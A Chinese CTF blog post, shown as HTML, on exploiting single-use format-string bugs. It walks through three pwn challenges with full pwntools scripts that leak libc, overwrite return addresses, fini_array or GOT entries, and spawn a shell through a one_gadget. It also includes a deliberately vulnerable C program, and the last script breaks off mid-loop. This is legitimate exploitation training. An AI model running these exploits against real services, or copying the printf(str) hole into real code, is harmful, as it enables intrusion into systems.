<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 7.2.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.6.0/css/all.min.css" integrity="sha256-5eIC48iZUHmSlSUz9XtjRyK2mzQkHScZY1WdMaoz74E=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/fancyapps-ui/5.0.31/fancybox/fancybox.css" integrity="sha256-gkQVf8UKZgQ0HyuxL/VnacadJ+D2Kox2TCEBuNQg5+w=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"example.com","root":"/","images":"/images","scheme":"Muse","darkmode":false,"version":"8.21.0","exturl":false,"sidebar":{"position":"left","width_expanded":320,"width_dual_column":240,"display":"post","padding":18,"offset":12},"hljswrap":false,"copycode":{"enable":false,"style":null},"fold":{"enable":false,"height":500},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":true,"lazyload":false,"pangu":true,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":"enable","motion":{"enable":true,"async":false,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"i18n":{"placeholder":"Searching...","empty":"We didn't find any results for the search: ${query}","hits_time":"${hits} results found in ${time} ms","hits":"${hits} results found"}}</script><script src="/js/config.js"></script>

    <meta name="description" content="一次性格式化字符串【2023 强网杯】ez_fmt没开pie，开了 full Relro，改不了got和fini_array，也给了buf地址，栈上地址用偏移算 改printf_ret地址，绕过w&#x3D;&#x3D;0xffff的限制，控制程序再次执行read 0x00401205  再次执行格式化字符串 #coding:utf-8 from pwn import * from pwnlib.">
<meta property="og:type" content="article">
<meta property="og:title" content="一次性格式化字符串利用">
<meta property="og:url" content="http://example.com/2024/06/08/%E4%B8%80%E6%AC%A1%E6%80%A7%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E5%88%A9%E7%94%A8/index.html">
<meta property="og:site_name" content="tw11ty">
<meta property="og:description" content="一次性格式化字符串【2023 强网杯】ez_fmt没开pie，开了 full Relro，改不了got和fini_array，也给了buf地址，栈上地址用偏移算 改printf_ret地址，绕过w&#x3D;&#x3D;0xffff的限制，控制程序再次执行read 0x00401205  再次执行格式化字符串 #coding:utf-8 from pwn import * from pwnlib.">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/tw11ty/MyPic/img202406071529364.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/tw11ty/MyPic/img202406071611393.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/tw11ty/MyPic/img202406071615607.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/tw11ty/MyPic/img202406071632618.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/tw11ty/MyPic/img202406071654277.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/tw11ty/MyPic/img202406071712038.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/tw11ty/MyPic/img202406081607924.png">
<meta property="article:published_time" content="2024-06-08T08:43:06.000Z">
<meta property="article:modified_time" content="2024-07-14T12:10:57.456Z">
<meta property="article:author" content="kkkk">
<meta property="article:tag" content="fmt">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://cdn.jsdelivr.net/gh/tw11ty/MyPic/img202406071529364.png">


<link rel="canonical" href="http://example.com/2024/06/08/%E4%B8%80%E6%AC%A1%E6%80%A7%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E5%88%A9%E7%94%A8/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"en","comments":true,"permalink":"http://example.com/2024/06/08/%E4%B8%80%E6%AC%A1%E6%80%A7%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E5%88%A9%E7%94%A8/","path":"2024/06/08/一次性格式化字符串利用/","title":"一次性格式化字符串利用"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>一次性格式化字符串利用 | tw11ty</title>
  








  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
<link rel="alternate" href="/atom.xml" title="tw11ty" type="application/atom+xml">
<link rel="stylesheet" href="/css/prism.css" type="text/css"></head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar" role="button">
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">tw11ty</p>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description">A blog powered by Hexo</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="Search" role="button">
    </div>
  </div>
</div>







</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E4%B8%80%E6%AC%A1%E6%80%A7%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2"><span class="nav-number">1.</span> <span class="nav-text">一次性格式化字符串</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E3%80%902023-%E5%BC%BA%E7%BD%91%E6%9D%AF%E3%80%91ez-fmt"><span class="nav-number">1.1.</span> <span class="nav-text">【2023 强网杯】ez_fmt</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#fmt"><span class="nav-number">1.2.</span> <span class="nav-text">fmt</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E3%80%90DASCTF-X-HDCTF-2024-%E5%85%AC%E5%BC%80%E8%B5%9B%E3%80%91%E7%AD%BE%E4%B8%AA%E5%88%B0%E5%90%A7"><span class="nav-number">1.3.</span> <span class="nav-text">【DASCTF X HDCTF 2024 公开赛】签个到吧</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%80%BB%E7%BB%93"><span class="nav-number">1.4.</span> <span class="nav-text">总结:</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%B8%80%E4%BA%9B%E6%80%9D%E8%80%83"><span class="nav-number">1.5.</span> <span class="nav-text">一些思考</span></a></li></ol></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">kkkk</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">9</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">7</span>
        <span class="site-state-item-name">tags</span>
      </div>
  </nav>
</div>

        </div>
      </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="en">
    <link itemprop="mainEntityOfPage" href="http://example.com/2024/06/08/%E4%B8%80%E6%AC%A1%E6%80%A7%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E5%88%A9%E7%94%A8/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="kkkk">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="tw11ty">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="一次性格式化字符串利用 | tw11ty">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          一次性格式化字符串利用
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">Posted on</span>

      <time title="Created: 2024-06-08 16:43:06" itemprop="dateCreated datePublished" datetime="2024-06-08T16:43:06+08:00">2024-06-08</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">Edited on</span>
      <time title="Modified: 2024-07-14 20:10:57" itemprop="dateModified" datetime="2024-07-14T20:10:57+08:00">2024-07-14</time>
    </span>

  
    <span class="post-meta-break"></span>
    <span class="post-meta-item" title="Word count in article">
      <span class="post-meta-item-icon">
        <i class="far fa-file-word"></i>
      </span>
      <span class="post-meta-item-text">Word count in article: </span>
      <span>9k</span>
    </span>
    <span class="post-meta-item" title="Reading time">
      <span class="post-meta-item-icon">
        <i class="far fa-clock"></i>
      </span>
      <span class="post-meta-item-text">Reading time &asymp;</span>
      <span>8 mins.</span>
    </span>
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><h1 id="一次性格式化字符串"><a href="#一次性格式化字符串" class="headerlink" title="一次性格式化字符串"></a>一次性格式化字符串</h1><h2 id="【2023-强网杯】ez-fmt"><a href="#【2023-强网杯】ez-fmt" class="headerlink" title="【2023 强网杯】ez_fmt"></a>【2023 强网杯】ez_fmt</h2><p>没开pie，开了 full Relro，改不了got和fini_array，也给了buf地址，栈上地址用偏移算</p>
<p>改printf_ret地址，绕过w&#x3D;&#x3D;0xffff的限制，控制程序再次执行read 0x00401205  再次执行格式化字符串</p>
<pre class=" language-highlight python"><span class="comment"><code class="language-highlight python"><span class="comment">#coding:utf-8</span>
<span class="keyword">from</span> pwn <span class="keyword">import</span> *
<span class="keyword">from</span> pwnlib.util.packing <span class="keyword">import</span> p64, u64, p32, u32
<span class="comment">#from ctypes import *</span>
<span class="comment">#from LibcSearcher import *</span>

s    = <span class="keyword">lambda</span> data               : io.send(data)
sa   = <span class="keyword">lambda</span> delim, data        : io.sendafter(delim,data)
sl   = <span class="keyword">lambda</span> data               : io.sendline(data)
sla  = <span class="keyword">lambda</span> delim, data        : io.sendlineafter(delim, data)
r    = <span class="keyword">lambda</span> num=<span class="number">4096</span>           : io.recv(num)
ru   = <span class="keyword">lambda</span> delims, drop=<span class="literal">True</span>  : io.recvuntil(delims, drop)
itr  = <span class="keyword">lambda</span>                    : io.interactive()
r64  = <span class="keyword">lambda</span>                    : io.recvuntil(<span class="string">b&#x27;\x7f&#x27;</span>)[-<span class="number">6</span>:].ljust(<span class="number">8</span>,<span class="string">b&#x27;\x00&#x27;</span>)
r32  = <span class="keyword">lambda</span>                    : io.recvuntil(<span class="string">b&#x27;\x7f&#x27;</span>)[-<span class="number">4</span>:]
uu32 = <span class="keyword">lambda</span> data               : u32(data.ljust(<span class="number">4</span>, <span class="string">b&#x27;\x00&#x27;</span>))
uu64 = <span class="keyword">lambda</span> data               : u64(data.ljust(<span class="number">8</span>, <span class="string">b&#x27;\x00&#x27;</span>))
leak = <span class="keyword">lambda</span> name, value        : info(<span class="string">"&#123;&#125;:0x&#123;:x&#125;"</span>.<span class="built_in">format</span>(name,value))

<span class="keyword">def</span> <span class="title function_">debug</span>(<span class="params">cmd=<span class="string">&#x27;&#x27;</span></span>):
    gdb.attach(io,cmd)
    pause()

<span class="keyword">def</span> <span class="title function_">fmt</span>(<span class="params">data1,data2</span>):   <span class="comment">#payload = b&#x27;%&#x27; + str(data) + b&#x27;c&#x27; + padding + &#x27;%&#x27; + str(offset) + b&#x27;$hhn&#x27; + p64(adr)</span>
    padding1  = <span class="string">b&#x27;&#x27;</span>
    padding2  = <span class="string">b&#x27;&#x27;</span>
    data2     = data2-data1  
    payload1  = <span class="string">b&#x27;%&#x27;</span> + <span class="built_in">str</span>(data1) + <span class="string">b&#x27;c&#x27;</span> + padding1 + <span class="string">&#x27;%10$hn&#x27;</span>
    <span class="keyword">if</span>(<span class="built_in">len</span>(payload1)<<span class="number">0x10</span>):
        padding1 += <span class="string">b&#x27;a&#x27;</span> * (<span class="number">0x10</span>-<span class="built_in">len</span>(payload1))
        data1    -= <span class="built_in">len</span>(padding1)
        payload1  = <span class="string">b&#x27;%&#x27;</span> + <span class="built_in">str</span>(data1) + <span class="string">b&#x27;c&#x27;</span> + padding1 + <span class="string">&#x27;%10$hn&#x27;</span>
        <span class="keyword">if</span>(<span class="built_in">len</span>(payload1)<<span class="number">0x10</span>):
            padding1 += <span class="string">b&#x27;a&#x27;</span> * (<span class="number">0x10</span>-<span class="built_in">len</span>(payload1))
            payload1   = <span class="string">b&#x27;%&#x27;</span> + <span class="built_in">str</span>(data1) + <span class="string">b&#x27;c&#x27;</span> + padding1 + <span class="string">&#x27;%10$hn&#x27;</span>

    payload2 = payload1 + <span class="string">b&#x27;%&#x27;</span> + <span class="built_in">str</span>(data2) + <span class="string">b&#x27;c&#x27;</span> + padding2 + <span class="string">b&#x27;%11$hn&#x27;</span>
    <span class="built_in">print</span>(payload2)
    <span class="keyword">if</span>(<span class="built_in">len</span>(payload2)<<span class="number">0x20</span>):
        padding2 += <span class="string">b&#x27;a&#x27;</span> * (<span class="number">0x20</span>-<span class="built_in">len</span>(payload2))
        data2    -= <span class="built_in">len</span>(padding2)
        payload2   = payload1 + <span class="string">b&#x27;%&#x27;</span> + <span class="built_in">str</span>(data2) + <span class="string">b&#x27;c&#x27;</span> + padding2 + <span class="string">b&#x27;%11$hn&#x27;</span>
        <span class="keyword">if</span>(<span class="built_in">len</span>(payload2)<<span class="number">0x20</span>):
            padding2 += <span class="string">b&#x27;a&#x27;</span> * (<span class="number">0x20</span>-<span class="built_in">len</span>(payload2))
            payload2   = payload1 + <span class="string">b&#x27;%&#x27;</span> + <span class="built_in">str</span>(data2) + <span class="string">b&#x27;c&#x27;</span> + padding2 + <span class="string">b&#x27;%11$hn&#x27;</span>
    payload2 += p64(ret_addr) + p64(ret_addr+<span class="number">2</span>)
    <span class="keyword">return</span> payload2

<span class="keyword">def</span> <span class="title function_">pwn</span>():
    py1 = <span class="string">b&#x27;%4198917c%9$hn%19$paaaaa&#x27;</span> + p64(printf_ret)
    <span class="comment"># debug()</span>
    s(py1)
    ru(<span class="string">b&#x27;0x&#x27;</span>)
    libc_base = <span class="built_in">int</span>(r(<span class="number">12</span>), <span class="number">16</span>) - libc.sym[<span class="string">&#x27;__libc_start_main&#x27;</span>]-<span class="number">243</span>
    leak(<span class="string">"libc_base"</span> , libc_base)
    one_gadget = libc_base + <span class="number">0xe3b01</span>
    <span class="comment"># debug()</span>
    py2 = fmt(one_gadget&<span class="number">0xffff</span>,(one_gadget>><span class="number">16</span>)&<span class="number">0xffff</span>)
    s(py2)

<span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span> :
    pwn_log_level = <span class="string">&#x27;info&#x27;</span>   
    pwn_arch = <span class="string">&#x27;amd64&#x27;</span>
    pwn_os = <span class="string">&#x27;linux&#x27;</span>
    context(log_level=pwn_log_level, arch=pwn_arch, os=pwn_os)
    context.terminal = [<span class="string">&#x27;tmux&#x27;</span>,<span class="string">&#x27;splitw&#x27;</span>,<span class="string">&#x27;-h&#x27;</span>]
    pwnfile = <span class="string">&#x27;./ez_fmt&#x27;</span>
    io = process(pwnfile)
    io = remote(<span class="string">&#x27;47.104.24.40&#x27;</span>,<span class="number">1337</span>)

    elf = ELF(pwnfile)
    rop = ROP(pwnfile)
    context.binary = pwnfile
    libc_name  = <span class="string">&#x27;./libc-2.31.so&#x27;</span>
    libc = ELF(libc_name) 

    fini_arry = <span class="number">0x0403DC0</span>
    main      = elf.sym[<span class="string">&#x27;main&#x27;</span>]
    
    ru(<span class="string">b&#x27;0x&#x27;</span>)
    stack = <span class="built_in">int</span>(r(<span class="number">12</span>), <span class="number">16</span>)
    ret_addr   = stack + <span class="number">0x68</span>
    printf_ret = stack - <span class="number">0x8</span>
    leak(<span class="string">"print_ret"</span>,printf_ret)
    leak(<span class="string">"ret_addr"</span>,ret_addr)
    pwn()

    itr()
</code></pre>



<h2 id="fmt"><a href="#fmt" class="headerlink" title="fmt"></a>fmt</h2><p>自己出的练手题  没开RELRO，直接打fini_array绕过一次性格式化字符串</p>
<pre class=" language-highlight c"><span class="meta">#<span class="keyword">include</span><span class="string"><code class="language-highlight c"><span class="meta">#<span class="keyword">include</span><span class="string"><stdio.h></span></span>

<span class="type">int</span> <span class="title function_">init_func</span><span class="params">()</span>&#123;
    setvbuf(<span class="built_in">stdin</span>,<span class="number">0</span>,<span class="number">2</span>,<span class="number">0</span>);
    setvbuf(<span class="built_in">stdout</span>,<span class="number">0</span>,<span class="number">2</span>,<span class="number">0</span>);
    setvbuf(<span class="built_in">stderr</span>,<span class="number">0</span>,<span class="number">2</span>,<span class="number">0</span>);
    <span class="keyword">return</span> <span class="number">0</span>;
&#125;

<span class="type">void</span> <span class="title function_">main</span><span class="params">()</span>&#123;
    init_func();
    <span class="type">char</span> str[<span class="number">0x100</span>];
    <span class="built_in">printf</span>(<span class="string">"please input your payload:"</span>);
    read(<span class="number">0</span>, str, <span class="number">0x100</span>);
    <span class="built_in">printf</span>(str);
&#125;

<span class="comment">//gcc fmt.c -no-pie -z norelro  -o fmt </span></code></pre>

<pre class=" language-highlight python"><span class="comment"><code class="language-highlight python"><span class="comment">#coding:utf-8</span>
<span class="keyword">from</span> pwn <span class="keyword">import</span> *
<span class="keyword">from</span> pwnlib.util.packing <span class="keyword">import</span> p64, u64, p32, u32
<span class="comment">#from ctypes import *</span>
<span class="comment">#from LibcSearcher import *</span>
<span class="comment">#from struct import pack</span>

s    = <span class="keyword">lambda</span> data               : io.send(data)
sl   = <span class="keyword">lambda</span> data               : io.sendline(data)
sa   = <span class="keyword">lambda</span> delim, data        : io.sendafter(delim,data)
sla  = <span class="keyword">lambda</span> delim, data        : io.sendlineafter(delim, data)
r    = <span class="keyword">lambda</span> num=<span class="number">4096</span>           : io.recv(num)
ru   = <span class="keyword">lambda</span> delims, drop=<span class="literal">True</span>  : io.recvuntil(delims, drop)
itr  = <span class="keyword">lambda</span>                    : io.interactive()
r64  = <span class="keyword">lambda</span>                    : io.recvuntil(<span class="string">b&#x27;\x7f&#x27;</span>)[-<span class="number">6</span>:].ljust(<span class="number">8</span>,<span class="string">b&#x27;\x00&#x27;</span>)
r32  = <span class="keyword">lambda</span>                    : io.recvuntil(<span class="string">b&#x27;\x7f&#x27;</span>)[-<span class="number">4</span>:]
uu32 = <span class="keyword">lambda</span> data               : u32(data.ljust(<span class="number">4</span>, <span class="string">b&#x27;\x00&#x27;</span>))
uu64 = <span class="keyword">lambda</span> data               : u64(data.ljust(<span class="number">8</span>, <span class="string">b&#x27;\x00&#x27;</span>))
leak = <span class="keyword">lambda</span> name, value        : info(<span class="string">"&#123;&#125;:0x&#123;:x&#125;"</span>.<span class="built_in">format</span>(name,value))

<span class="keyword">def</span> <span class="title function_">debug</span>(<span class="params">cmd=<span class="string">&#x27;&#x27;</span></span>):
    gdb.attach(io,cmd)
    pause()

<span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span> :
    pwn_log_level = <span class="string">&#x27;info&#x27;</span>   <span class="comment">#&#x27;info&#x27;</span>
    pwn_arch = <span class="string">&#x27;amd64&#x27;</span>
    pwn_os = <span class="string">&#x27;linux&#x27;</span>
    context(log_level=pwn_log_level, arch=pwn_arch, os=pwn_os)
    context.terminal = [<span class="string">&#x27;tmux&#x27;</span>,<span class="string">&#x27;splitw&#x27;</span>,<span class="string">&#x27;-h&#x27;</span>]
    pwnfile = <span class="string">&#x27;./fmt&#x27;</span>
    <span class="comment">#io = process(pwnfile)</span>
    io = remote(<span class="string">&#x27;&#x27;</span>,  )
    elf = ELF(pwnfile)
    rop = ROP(pwnfile)
    libc_name = <span class="string">&#x27;./libc.so.6&#x27;</span>   
    libc = ELF(libc_name) 

    fini_arry = <span class="number">0x0403198</span> 
    main = <span class="number">0x4011ff</span>
    printf_got = elf.got[<span class="string">&#x27;printf&#x27;</span>]

    payload = <span class="string">b&#x27;%41$p--%43$paaaa&#x27;</span>  + fmtstr_payload(<span class="number">8</span>, &#123;fini_arry : main&#125;, numbwritten=<span class="number">34</span>)
    ru(<span class="string">b&#x27;payload:&#x27;</span>)
    <span class="comment"># debug() </span>
    io.sendline(payload)
    ru(<span class="string">b&#x27;0x&#x27;</span>)
    libc_base = <span class="built_in">int</span>(r(<span class="number">12</span>), <span class="number">16</span>) - <span class="number">243</span> - libc.sym[<span class="string">&#x27;__libc_start_main&#x27;</span>]
    ru(<span class="string">b&#x27;0x&#x27;</span>)
    stack = <span class="built_in">int</span>(r(<span class="number">12</span>), <span class="number">16</span>) - <span class="number">0x2f0</span>      <span class="comment">#0xf0 -0xe0 - 0x120</span>
    leak(<span class="string">"libc_base"</span>, libc_base)
    leak(<span class="string">"stack"</span>, stack)

    one = <span class="number">0xe3b01</span> + libc_base     <span class="comment">#0xe3b01 0xe3b04 0xe3cf6 0x1075aa 0x1075b2 0x1075b7 0x1075c1</span>
    payload = fmtstr_payload(<span class="number">6</span>, &#123;stack:one&#125;)
    ru(<span class="string">b&#x27;payload:&#x27;</span>)
    <span class="comment"># debug()</span>
    s(payload)

    itr()
</code></pre>




<h2 id="【DASCTF-X-HDCTF-2024-公开赛】签个到吧"><a href="#【DASCTF-X-HDCTF-2024-公开赛】签个到吧" class="headerlink" title="【DASCTF X HDCTF 2024 公开赛】签个到吧"></a>【DASCTF X HDCTF 2024 公开赛】签个到吧</h2><p>非栈上一次性格式化字符串 </p>
<p>远程环境：2.31-0ubuntu9.15</p>
<p><img src="https://cdn.jsdelivr.net/gh/tw11ty/MyPic/img202406071529364.png" alt="image-20240607152900330"></p>
<p>给了栈地址 以及0x100长度限制的格式化字符串</p>
<blockquote>
<p>思路：改_exit_got为main地址同时泄露libc，然后再改exit_got为one_gadget，退出时执行one_gadget</p>
</blockquote>
<p>如何修改got？</p>
<p>printf时的栈空间  利用rsp+8 处的连续指针 （fmtarg 看相对偏移括号里面的不用管）</p>
<p><img src="https://cdn.jsdelivr.net/gh/tw11ty/MyPic/img202406071611393.png" alt="image-20240607161107350"></p>
<p>利用二连指针修改任意地址值</p>
<p>但是下面的payload并不能成功修改got地址   貌似使用%x$定位的话不能在同一条链子上改两次  (test&gt;exit_got)   没有将0x401030改成功</p>
<pre class=" language-highlight python">payload1  = <span class="string">b&#x27;%&#x27;</span> + <span class="built_in">str</span>(exit_got).encode(<span class="string">&quot;utf-8&quot;</span>) + <span class="string"><code class="language-highlight python">payload1  = <span class="string">b&#x27;%&#x27;</span> + <span class="built_in">str</span>(exit_got).encode(<span class="string">&quot;utf-8&quot;</span>) + <span class="string">b&#x27;c%7$ln&#x27;</span>
payload1 += <span class="string">b&#x27;%&#x27;</span> + <span class="built_in">str</span>(test-exit_got).encode(<span class="string">"utf-8"</span>) + <span class="string">b&#x27;c%49$ln&#x27;</span></code></pre>

<p><img src="https://cdn.jsdelivr.net/gh/tw11ty/MyPic/img202406071615607.png" alt="image-20240607161549570"></p>
<p>如果是修改不同链上则可以同时修改</p>
<pre class=" language-highlight python">payload1  = <span class="string">b&#x27;%&#x27;</span> + <span class="built_in">str</span>(main).encode(<span class="string">&quot;utf-8&quot;</span>) + <span class="string"><code class="language-highlight python">payload1  = <span class="string">b&#x27;%&#x27;</span> + <span class="built_in">str</span>(main).encode(<span class="string">&quot;utf-8&quot;</span>) + <span class="string">b&#x27;c%7$ln&#x27;</span>
payload1 += <span class="string">b&#x27;%&#x27;</span> + <span class="built_in">str</span>(exit_got-main).encode(<span class="string">"utf-8"</span>) + <span class="string">b&#x27;c%8$ln&#x27;</span></code></pre>

<p><img src="https://cdn.jsdelivr.net/gh/tw11ty/MyPic/img202406071632618.png" alt="image-20240607163238561"></p>
<p>直接使用格式化字符作为占位符的话可以在一条链子上改两次</p>
<pre class=" language-highlight python">payload1  = <span class="string">b&#x27;%&#x27;</span> + <span class="built_in">str</span>(exit_got-<span class="number">5</span>).encode(<span class="string">&quot;utf-8&quot;</span>) + <span class="string">b&#x27;c&#x27;</span> + <span class="string">b&#x27;%c&#x27;</span>*<span class="number">5</span> + <span class="string">b&#x27;%n&#x27;</span>   <span class="comment"><code class="language-highlight python">payload1  = <span class="string">b&#x27;%&#x27;</span> + <span class="built_in">str</span>(exit_got-<span class="number">5</span>).encode(<span class="string">&quot;utf-8&quot;</span>) + <span class="string">b&#x27;c&#x27;</span> + <span class="string">b&#x27;%c&#x27;</span>*<span class="number">5</span> + <span class="string">b&#x27;%n&#x27;</span>   <span class="comment">#7</span>
payload1 += <span class="string">b&#x27;%5c&#x27;</span> + <span class="string">b&#x27;%c&#x27;</span>*<span class="number">40</span> + <span class="string">b&#x27;%ln&#x27;</span>   <span class="comment">#49</span></code></pre>

<p><img src="https://cdn.jsdelivr.net/gh/tw11ty/MyPic/img202406071654277.png" alt="image-20240607165447235"></p>
<p>这样思路就明确了，先利用二连指针的第一个指针修改第二个指针指向exit_got，然后利用第二个指针修改exit_got地址为main函数地址</p>
<p>由于%hn只将打印出来字符的低二字节修改内存，所以打印出来的字符长度溢出时就能修改低二字节为任意值了</p>
<pre class=" language-highlight python">payload1  = <span class="string">b&#x27;%&#x27;</span> + <span class="built_in">str</span>(exit_got-<span class="number">5</span>).encode(<span class="string">&quot;utf-8&quot;</span>) + <span class="string">b&#x27;c&#x27;</span> + <span class="string">b&#x27;%c&#x27;</span>*<span class="number">5</span> + <span class="string">b&#x27;%ln&#x27;</span>   <span class="comment"><code class="language-highlight python">payload1  = <span class="string">b&#x27;%&#x27;</span> + <span class="built_in">str</span>(exit_got-<span class="number">5</span>).encode(<span class="string">&quot;utf-8&quot;</span>) + <span class="string">b&#x27;c&#x27;</span> + <span class="string">b&#x27;%c&#x27;</span>*<span class="number">5</span> + <span class="string">b&#x27;%ln&#x27;</span>   <span class="comment">#7</span>
payload1 += <span class="string">b&#x27;%&#x27;</span> + <span class="built_in">str</span>(<span class="number">0xd1fb</span>).encode(<span class="string">"utf-8"</span>) + <span class="string">b&#x27;c&#x27;</span> + <span class="string">b&#x27;%c&#x27;</span>*<span class="number">40</span> + <span class="string">b&#x27;%hn&#x27;</span>   <span class="comment">#49</span></code></pre>

<p><img src="https://cdn.jsdelivr.net/gh/tw11ty/MyPic/img202406071712038.png" alt="image-20240607171232992"></p>
<p>然后栈上还残留的指向exit_got指针来修改成为one_gadget</p>
<pre class=" language-highlight python"><span class="comment"><code class="language-highlight python"><span class="comment">#coding:utf-8</span>
<span class="keyword">from</span> pwn <span class="keyword">import</span> *
<span class="keyword">from</span> tw11ty <span class="keyword">import</span> *
<span class="comment">#from ctypes import *</span>

<span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span> :
    context.log_level = <span class="string">&#x27;info&#x27;</span>
    IPort = <span class="string">&#x27;node5.buuoj.cn 29958&#x27;</span>
    pwnfile = <span class="string">&#x27;./pwn&#x27;</span>
    libc_name = <span class="string">&#x27;/ctf/work/glibc-all-in-one/libs/2.31-0ubuntu9.15_amd64/libc.so.6&#x27;</span> 
    <span class="comment"># libc_name = &#x27;/lib/x86_64-linux-gnu/libc.so.6&#x27;</span>
    elf  = ELF(pwnfile)
    rop  = ROP(pwnfile)
    libc = ELF(libc_name)

    <span class="keyword">while</span>(<span class="literal">True</span>):
        io = init(pwnfile, IPort, libc_name)
        exit_got = elf.got[<span class="string">&#x27;_exit&#x27;</span>]
        main     = elf.sym[<span class="string">&#x27;main&#x27;</span>]

        ru(<span class="string">b&#x27;Gift addr: &#x27;</span>)
        stack = <span class="built_in">int</span>(r(<span class="number">12</span>), <span class="number">16</span>)
        leak(<span class="string">"stack"</span>, stack)

        payload1  = <span class="string">b&#x27;%&#x27;</span> + <span class="built_in">str</span>(exit_got-<span class="number">5</span>).encode(<span class="string">"utf-8"</span>) + <span class="string">b&#x27;c&#x27;</span> + <span class="string">b&#x27;%c&#x27;</span>*<span class="number">5</span> + <span class="string">b&#x27;%ln&#x27;</span>   <span class="comment">#7</span>
        payload1 += <span class="string">b&#x27;%&#x27;</span> + <span class="built_in">str</span>(<span class="number">0xd1fb</span>).encode(<span class="string">"utf-8"</span>) + <span class="string">b&#x27;c&#x27;</span> + <span class="string">b&#x27;%c&#x27;</span>*<span class="number">40</span> + <span class="string">b&#x27;%hn&#x27;</span>   <span class="comment">#49</span>
